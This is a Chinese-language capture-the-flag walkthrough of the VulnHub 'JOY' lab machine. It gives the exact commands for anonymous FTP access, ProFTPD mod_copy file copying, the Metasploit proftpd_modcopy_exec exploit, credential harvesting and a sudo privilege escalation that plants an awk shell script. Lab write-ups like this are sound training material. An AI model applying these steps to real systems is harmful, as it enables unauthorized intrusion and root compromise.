前期准备
镜像下载
https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
环境配置:
在VM以net连接打开虚拟机
使用的机器:
攻击机:kali linux,ubuntu
靶机:ip随配(192.168.119.137)
渗透开始
1.nmap发现主机,并扫描其ip信息
nmap -A 192.168.119.137
2.发现ftp相关的知识,尝试登陆ftp
ftp 192.168.119.137
账号:anonymous
密码:空
ls
cd download
ls
cd ..
cd upload
ls
get directory
退出ftp
cat directory
由于version_control存在于patrick路径中,我们是没有权限去获取的,所以尝试将其转移到/upload路径中
telnet 192.168.119.137 21
site cpfr /home/patrick/version_control
site cpto /home/upload/version_control
3.下载相关文件,发现版本漏洞
访问路径 ftp://192.168.119.137/upload/version_control
直接下载一个文件,打开
由上 proftpd的版本是存在漏洞的,并且告诉了webroot路径,可以使用msf里面的脚本攻击
4.使用msf获得shell,并尝试提权
use exploit/unix/ftp/proftpd_modcopy_exec
set rhosts 192.168.119.137
set sitepath /var/www/tryingharderisjoy
python -c 'import pty; pty.spawn("/bin/bash")'
ls
cd ossec
ls
cat patricksecretsofjoy
发现账户以及密码
5.得到另一个账号,尝试提权
切换账户登陆
su -l patrick
6.将提权的脚本写入对应的路径中
可以看到在路径 /home//patrick/script/test 是免密的
那我们可以尝试上传脚本文件到此路径中
本地主机编写脚本
echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
使用ftp上传到upload
cd upload
put test
在使用telnet转换一下路径
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test
7.提权
sudo /home/patrick/script/test
cd /root
cat proof.txt
author-secret.txt